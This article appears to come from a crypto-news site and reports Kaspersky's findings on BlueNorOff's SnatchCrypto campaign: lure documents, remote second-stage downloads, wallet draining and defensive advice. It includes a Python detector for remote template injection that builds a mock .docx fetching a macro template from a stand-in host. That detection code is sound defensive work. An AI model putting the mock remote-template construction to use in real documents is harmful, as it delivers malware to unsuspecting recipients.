
BlueNorOff is a hacker organisation that targets cryptocurrency companies.
Cybercrime, like technology, evolves over time. Some of today's most effective cybercrime organisations are based in the Democratic People's Republic of Korea (DPRK), a totalitarian state headed by dictator Kim Jong-un.
In January 2022, researchers reported that a well-known North Korean hacking group had been targeting cryptocurrency firms in numerous countries, stealing millions of dollars in the process.
This series of attacks on crypto businesses, dubbed SnatchCrypto, was documented by researchers at the Russian antivirus firm Kaspersky.
Kaspersky attributes the campaign to BlueNorOff, a financially motivated unit of the infamous North Korean cybercrime organisation Lazarus Group, also known as Guardians of Peace or Whois Team.
BlueNorOff (also tracked as APT38, Stardust Chollima, BeagleBoyz, and NICKEL GLADSTONE) uses sophisticated social engineering and impersonates reputable entities to deceive its victims into opening infected files.
For example, the group could share a document via Google Drive. The file may appear to be completely legitimate, with a name such as "Digital Investment Strategy."
The group may also compromise another company and email its target from an address belonging to that company. In one case, the attackers broke into a legitimate registered company and took over its social media accounts. Using these identities, they delivered bogus business offers, in the form of malicious documents, to their targets.
BlueNorOff does not always need to breach another company to reach its targets. Often it simply impersonates a business and distributes the malicious files directly.
According to Kaspersky, these attacks are successful because blockchain-based firms frequently get letters, contracts, offers, and other business-related information from unknown sources.
The documents themselves appear, and in some cases are, legitimate: the lure file carries no malicious code of its own. If the victim opens it while disconnected from the internet, nothing happens and no malware is installed.
If the victim is online, however, opening the file causes it to fetch a second, macro-enabled document from a server controlled by the attackers; the macros in that downloaded document are what install the malware. Because the malicious content is not in the attachment itself, static scanning of the email attachment alone sees nothing wrong.
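The behaviour described above, a document that is clean on disk but pulls a second stage when opened online, is usually implemented with an external "attachedTemplate" relationship inside the Office package (the technique is commonly called remote template injection). The following detector is an added example, not code from Kaspersky's report or from the campaign; it builds two minimal .docx packages in memory, one benign and one carrying a remote template pointing at a hypothetical host (example.invalid), and flags any relationship whose target is fetched over HTTP(S). The package layout and URL are constructed for the example.

```python
"""Flag Office documents that fetch a remote template on open.

Added example (not from Kaspersky or the SnatchCrypto campaign).
A .docx is a ZIP of XML parts; relationships between parts live in *.rels
files. A relationship with TargetMode="External" whose Target is an http(s)
URL makes Word reach out to that URL when the document is opened, which is
exactly why an offline open is harmless and an online open is not.
"""
import io
import re
import zipfile
from typing import Dict, List, Optional

# Hypothetical attacker-controlled template URL, constructed for this example.
REMOTE_TEMPLATE_URL = "http://example.invalid/Digital_Investment_Strategy.dotm"

REL_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"


def _build_docx(external_template: Optional[str]) -> bytes:
    """Build a minimal OOXML package; only the parts the detector reads are realistic."""
    rels = [
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>',
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">',
    ]
    if external_template:
        rels.append(
            f'<Relationship Id="rId1" Type="{REL_NS}/attachedTemplate" '
            f'Target="{external_template}" TargetMode="External"/>'
        )
    rels.append("</Relationships>")
    settings = (
        '<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
        f'xmlns:r="{REL_NS}">'
        + ('<w:attachedTemplate r:id="rId1"/>' if external_template else "")
        + "</w:settings>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/settings.xml", settings)
        z.writestr("word/_rels/settings.xml.rels", "\n".join(rels))
    return buf.getvalue()


# Match one <Relationship .../> element that is marked External, then pull its attributes.
EXTERNAL_REL = re.compile(r'<Relationship\b[^>]*\bTargetMode="External"[^>]*/?>', re.I)
TARGET_ATTR = re.compile(r'\bTarget="([^"]*)"', re.I)
TYPE_ATTR = re.compile(r'\bType="([^"]*)"', re.I)


def find_external_relationships(docx_bytes: bytes) -> List[Dict[str, str]]:
    """Return every externally targeted relationship in any .rels part of the package."""
    hits: List[Dict[str, str]] = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            xml = z.read(name).decode("utf-8", errors="replace")
            for rel in EXTERNAL_REL.finditer(xml):
                tag = rel.group(0)
                target = TARGET_ATTR.search(tag)
                rtype = TYPE_ATTR.search(tag)
                hits.append({
                    "part": name,
                    # Keep only the last path segment of the type URI, e.g. "attachedTemplate".
                    "type": rtype.group(1).rsplit("/", 1)[-1] if rtype else "",
                    "target": target.group(1) if target else "",
                })
    return hits


def is_suspicious(docx_bytes: bytes) -> bool:
    """True when the document would fetch a template over HTTP(S) when opened online."""
    return any(
        h["type"] == "attachedTemplate"
        and h["target"].lower().startswith(("http://", "https://"))
        for h in find_external_relationships(docx_bytes)
    )


BENIGN_DOCX = _build_docx(None)
MALICIOUS_DOCX = _build_docx(REMOTE_TEMPLATE_URL)

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_DOCX), ("remote-template", MALICIOUS_DOCX)):
        print(label, "suspicious" if is_suspicious(blob) else "clean",
              find_external_relationships(blob))
```

To use this on a real attachment, read the file's bytes and pass them to is_suspicious; a legitimate corporate template referenced by a local path will show up in find_external_relationships but will not be flagged, so review those entries by hand rather than treating every external relationship as malicious.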
After infiltrating the target, the attackers monitor its activity for weeks or even months. When the victim prepares a large cryptocurrency transaction, the attackers are alerted and intervene in the transaction, effectively draining the target's crypto wallet.
Why Is BlueNorOff Interested in Crypto Startups?
Because stolen cryptocurrency can be moved across borders in minutes and is very hard to freeze or recover once it has been laundered (transactions on public blockchains are traceable, which is how analytics firms produce their estimates, but tracing rarely gets the money back), it is no surprise that groups such as BlueNorOff target crypto-related businesses.
According to a report from the blockchain analytics firm Chainalysis, the Lazarus Group extracted roughly $400 million in digital assets from organisations around the world in 2021 alone. The stolen funds were carefully moved to North Korean-controlled accounts before being laundered by the regime.
The money is believed to fund the nuclear weapons and ballistic missile programmes of Kim Jong-un's regime, which is heavily sanctioned by Western powers.
According to Chainalysis, the North Korean government "supports cryptocurrency-enabled criminality on a vast scale," making it a major danger to the crypto economy as a whole.
Defending Against BlueNorOff
According to Kaspersky, to protect themselves from BlueNorOff and similar groups, companies should first educate their staff about social engineering and phishing attacks and provide thorough cybersecurity training.
Organisations should also carry out regular cybersecurity assessments and invest in comprehensive protection so that intrusions are detected early, before any theft takes place.
In general, every organisation should pay close attention to its cybersecurity hygiene, keep all of its software up to date, and invest in reliable data backup solutions.
By Crypto Pirates